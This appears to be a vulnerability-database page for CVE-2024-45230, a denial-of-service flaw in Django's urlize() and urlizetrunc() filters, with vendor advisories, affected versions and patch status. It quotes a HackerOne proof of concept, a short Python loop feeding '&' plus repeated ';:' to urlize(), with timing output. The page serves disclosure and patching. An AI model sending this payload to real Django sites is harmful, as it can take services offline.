CVE-2024-45230
published 2024-10-08CVE-2024-45230: An issue was discovered in Django 5.1 before 5.1.1, 5.0 before 5.0.9, and 4.2 before 4.2.16. The urlize() and urlizetrunc() template filters are subject to a…
PriorityP348high7.5CVSS 3.1
AVNACLPRNUINSUCNINAH
EPSS
25.33%
97.7th percentile
An issue was discovered in Django 5.1 before 5.1.1, 5.0 before 5.0.9, and 4.2 before 4.2.16. The urlize() and urlizetrunc() template filters are subject to a potential denial-of-service attack via very large inputs with a specific sequence of characters.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | python-django | < python-django 3:4.2.16-1 (forky) | python-django 3:4.2.16-1 (forky) |
| djangoproject | django | — | — |
| djangoproject | django | >= 4.2 < 4.2.16 | 4.2.16 |
| djangoproject | django | >= 4.2.0 < 4.2.16 | 4.2.16 |
| djangoproject | django | >= 5.0 < 5.0.9 | 5.0.9 |
| djangoproject | django | >= 5.0 < 5.0.9 | 5.0.9 |
| djangoproject | django | >= 5.1 < 5.1.1 | 5.1.1 |
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
osv7.5HIGH
vendor_debian7.5HIGH
vendor_redhat7.5HIGH
vendor_ubuntu7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
CVE-2024-45230: An issue was discovered in Django 5
osv·2024-10-08·CVSS 7.5
CVE-2024-45230 [HIGH] CVE-2024-45230: An issue was discovered in Django 5
An issue was discovered in Django 5.1 before 5.1.1, 5.0 before 5.0.9, and 4.2 before 4.2.16. The urlize() and urlizetrunc() template filters are subject to a potential denial-of-service attack via very large inputs with a specific sequence of characters.
GHSA
Django vulnerable to denial-of-service attack via the urlize() and urlizetrunc() template filters
ghsa·2024-10-08
CVE-2024-45230 [MEDIUM] CWE-120 Django vulnerable to denial-of-service attack via the urlize() and urlizetrunc() template filters
Django vulnerable to denial-of-service attack via the urlize() and urlizetrunc() template filters
An issue was discovered in Django 5.1 before 5.1.1, 5.0 before 5.0.9, and 4.2 before 4.2.16. The urlize() and urlizetrunc() template filters are subject to a potential denial-of-service attack via very large inputs with a specific sequence of characters.
OSV
Django vulnerable to denial-of-service attack via the urlize() and urlizetrunc() template filters
osv·2024-10-08
CVE-2024-45230 [MEDIUM] Django vulnerable to denial-of-service attack via the urlize() and urlizetrunc() template filters
Django vulnerable to denial-of-service attack via the urlize() and urlizetrunc() template filters
An issue was discovered in Django 5.1 before 5.1.1, 5.0 before 5.0.9, and 4.2 before 4.2.16. The urlize() and urlizetrunc() template filters are subject to a potential denial-of-service attack via very large inputs with a specific sequence of characters.
OSV
python-django vulnerabilities
osv·2024-09-03·CVSS 7.5
CVE-2024-45230 [HIGH] python-django vulnerabilities
python-django vulnerabilities
It was discovered that Django incorrectly handled certain inputs.
An attacker could possibly use this issue to cause a denial of service.
(CVE-2024-45230)
It was discovered that Django incorrectly handled certain email sending
failures. A remote attacker could possibly use this issue to enumerate
user emails by issuing password reset requests and observing the outcomes.
(CVE-2024-45231)
Ubuntu
Django vulnerabilities
vendor_ubuntu·2024-09-03·CVSS 7.5
CVE-2024-45231 [HIGH] Django vulnerabilities
Title: Django vulnerabilities
Summary: Several security issues were fixed in Django.
It was discovered that Django incorrectly handled certain inputs.
An attacker could possibly use this issue to cause a denial of service.
(CVE-2024-45230)
It was discovered that Django incorrectly handled certain email sending
failures. A remote attacker could possibly use this issue to enumerate
user emails by issuing password reset requests and observing the outcomes.
(CVE-2024-45231)
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
python-django: Potential denial-of-service vulnerability in django.utils.html.urlize()
vendor_redhat·2024-09-03·CVSS 7.5
CVE-2024-45230 [HIGH] CWE-400 python-django: Potential denial-of-service vulnerability in django.utils.html.urlize()
python-django: Potential denial-of-service vulnerability in django.utils.html.urlize()
An issue was discovered in Django 5.1 before 5.1.1, 5.0 before 5.0.9, and 4.2 before 4.2.16. The urlize() and urlizetrunc() template filters are subject to a potential denial-of-service attack via very large inputs with a specific sequence of characters.
A flaw was found in Python's Django urlize() and urlizetrunc() functions. Excessive input with a specific sequence of characters may lead to denial of service.
Statement: CVE-2024-45230 is classified as a moderate severity vulnerability because, while it presents a potential denial-of-service (DoS) risk, it does not directly expose the application to data breaches or arbitrary code execution. The vulnerability arises from inefficient handling of very
Debian
CVE-2024-45230: python-django - An issue was discovered in Django 5.1 before 5.1.1, 5.0 before 5.0.9, and 4.2 be...
vendor_debian·2024·CVSS 7.5
CVE-2024-45230 [HIGH] CVE-2024-45230: python-django - An issue was discovered in Django 5.1 before 5.1.1, 5.0 before 5.0.9, and 4.2 be...
An issue was discovered in Django 5.1 before 5.1.1, 5.0 before 5.0.9, and 4.2 before 4.2.16. The urlize() and urlizetrunc() template filters are subject to a potential denial-of-service attack via very large inputs with a specific sequence of characters.
Scope: local
bookworm: open
bullseye: open
forky: resolved (fixed in 3:4.2.16-1)
sid: resolved (fixed in 3:4.2.16-1)
trixie: resolved (fixed in 3:4.2.16-1)
No detection rules found.
No public exploits indexed.
HackerOne
CVE-2024-45230 - Potential denial-of-service in django.utils.html.urlize() (Another pattern)
hackerone·2025-02-05·CVSS 7.5
CVE-2024-45230 [HIGH] CVE-2024-45230 - Potential denial-of-service in django.utils.html.urlize() (Another pattern)
CVE-2024-45230 - Potential denial-of-service in django.utils.html.urlize() (Another pattern)
This one is similar to https://hackerone.com/reports/2795558, but I found the DoS vulnerability by putting an ampersand character beside repeated `;:` characters.
This is the PoC that I used:
```
import django.utils.html
from time import time
print("=== django.utils.html.urlize('&' + ';:' * n) ===")
for i in range(0,600000, 40000):
start = time()
pattern = ';:'
PAYLOAD = '&' + pattern * i
django.utils.html.urlize(PAYLOAD)
print(len(PAYLOAD), "\t", time() - start)
input("")
```
```
=== django.utils.html.urlize('&' + ';:' * n) ===
2 0.0
80002 0.8933408260345459
160002 3.4347267150878906
240002 7.70803427696228
320002 14.04338812828064
400002 23.33271551132202
480002 34.01262950897217
560002 50.185
Bugzilla
CVE-2024-45230 python-django3: Potential denial-of-service vulnerability in django.utils.html.urlize() [epel-all]
bugzilla·2024-09-24·CVSS 7.5
CVE-2024-45230 [HIGH] CVE-2024-45230 python-django3: Potential denial-of-service vulnerability in django.utils.html.urlize() [epel-all]
CVE-2024-45230 python-django3: Potential denial-of-service vulnerability in django.utils.html.urlize() [epel-all]
More information about this security flaw is available in the following bug:
https://bugzilla.redhat.com/show_bug.cgi?id=2314485
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Discussion:
There is no issued fix for Django 3.x which is EOL. Please advise if you recommend retiring the package
---
Package `python-django3` is retired on the `epel8` dist-git branch (the `dead.package` marker is present); closing as CANTFIX since there's no live package to update.
2024-10-08
Published